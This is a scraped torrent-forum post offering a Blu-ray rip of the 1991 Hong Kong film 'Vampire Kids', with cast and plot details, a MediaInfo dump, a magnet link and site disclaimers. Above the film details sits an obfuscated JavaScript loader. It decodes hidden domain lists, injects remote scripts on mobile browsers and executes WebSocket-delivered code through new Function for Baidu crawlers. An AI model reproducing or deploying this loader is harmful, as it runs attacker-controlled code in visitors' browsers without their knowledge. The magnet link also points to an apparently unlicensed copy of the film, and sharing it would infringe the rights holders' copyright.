僵尸福星仔[国粤语音轨/中文字幕]Vampire.Kids.1991.1080p.BluRay.x264.DTS.2Audio-迅雷下载 10.73GB

版主小s 14天前 220

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 僵尸福星仔 / Vampire kids / 尸王争霸

◎片 名 殭屍福星仔

◎年 代 1991

◎产 地 中国香港

◎类 别 喜剧 / 恐怖

◎语 言 粤语

◎上映日期 1991-05-16(中国香港)

◎IMDb评分 4.2/10 from 55 users

◎IMDb链接 https://www.imdb.com/title/tt0102156

◎豆瓣评分 5.1/10 from 1180 users

◎豆瓣链接 https://movie.douban.com/subject/1301338/

◎片 长 85分钟

◎导 演 夏秀轩 Sau-Hin Ha / 李百龄 Keith Li

◎编 剧 高振伟 Chun-Wai Ko

◎主 演 楼南光 Billy Lau

吴君如 Sandra Ng

成奎安 Fui-On Shing

叶子楣 Amy Yip

倪雪 Xue Ni

郑伟明 William Cheng

黄小龙 Wong Siu Lung

陈治良 Frankie Chin

◎标 签 僵尸 | 香港 | 喜剧 | 吴君如 | 香港电影 | 叶子媚 | 恐怖 | 搞笑

◎简 介

旅行团意外流落荒岛,领队在一废村里发现巨大钻石,一时贪心将其取走,却误将鬼王释放。鬼王法力未恢复,岛上众人尚能幸存,还互相发生争执,可鬼王法力渐渐恢复,众人陷入危机之中,才意识到要消灭鬼王只有同心协力……

  1. General

  2. Unique ID : 221417767725042853785324188016482268650 (0xA69382CADF9CF2E3488B38E4D1A135EA)

  3. Complete name : [email protected]mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.7 GiB

  7. Duration : 1 h 25 min

  8. Overall bit rate : 18.0 Mb/s

  9. Movie name : Vampire Kids 1991

  10. Encoded date : UTC 2021-07-11 12:18:21

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 25 min

  25. Bit rate : 15.0 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.301

  36. Stream size : 8.92 GiB (83%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=34 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=20.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : DTS

  44. Format/Info : Digital Theater Systems

  45. Codec ID : A_DTS

  46. Duration : 1 h 25 min

  47. Bit rate mode : Constant

  48. Bit rate : 1 510 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : C L R Ls Rs LFE

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 93.750 FPS (512 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossy

  55. Stream size : 920 MiB (8%)

  56. Title : Cantonese

  57. Language : Chinese

  58. Default : Yes

  59. Forced : No


  60. Audio #2

  61. ID : 3

  62. Format : DTS

  63. Format/Info : Digital Theater Systems

  64. Codec ID : A_DTS

  65. Duration : 1 h 25 min

  66. Bit rate mode : Constant

  67. Bit rate : 1 510 kb/s

  68. Channel(s) : 6 channels

  69. Channel layout : C L R Ls Rs LFE

  70. Sampling rate : 48.0 kHz

  71. Frame rate : 93.750 FPS (512 SPF)

  72. Bit depth : 24 bits

  73. Compression mode : Lossy

  74. Stream size : 920 MiB (8%)

  75. Title : Mandarin

  76. Language : Chinese

  77. Default : No

  78. Forced : No


  79. Text #1

  80. ID : 4

  81. ID in the original source medium : 4609 (0x1201)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 20 min

  87. Bit rate : 24.6 kb/s

  88. Count of elements : 1187

  89. Stream size : 14.2 MiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 20 min

  103. Bit rate : 25.3 kb/s

  104. Count of elements : 1187

  105. Stream size : 14.6 MiB (0%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4610 (0x1202)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 20 min

  119. Bit rate : 26.6 kb/s

  120. Count of elements : 1187

  121. Stream size : 15.3 MiB (0%)

  122. Language : English

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Menu

  127. 00:00:00.000 : Chapter 01

  128. 00:08:07.750 : Chapter 02

  129. 00:15:00.750 : Chapter 03

  130. 00:21:29.458 : Chapter 04

  131. 00:27:47.500 : Chapter 05

  132. 00:34:30.041 : Chapter 06

  133. 00:41:09.416 : Chapter 07

  134. 00:47:00.791 : Chapter 08

  135. 00:55:22.791 : Chapter 09

  136. 01:02:07.500 : Chapter 10

  137. 01:07:18.666 : Chapter 11

  138. 01:16:59.750 : Chapter 12


TAGS 恐怖 喜剧

磁力链:
  • magnet:?xt=urn:btih:1957A8CC19534FACD970D61275424638CF856B6A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回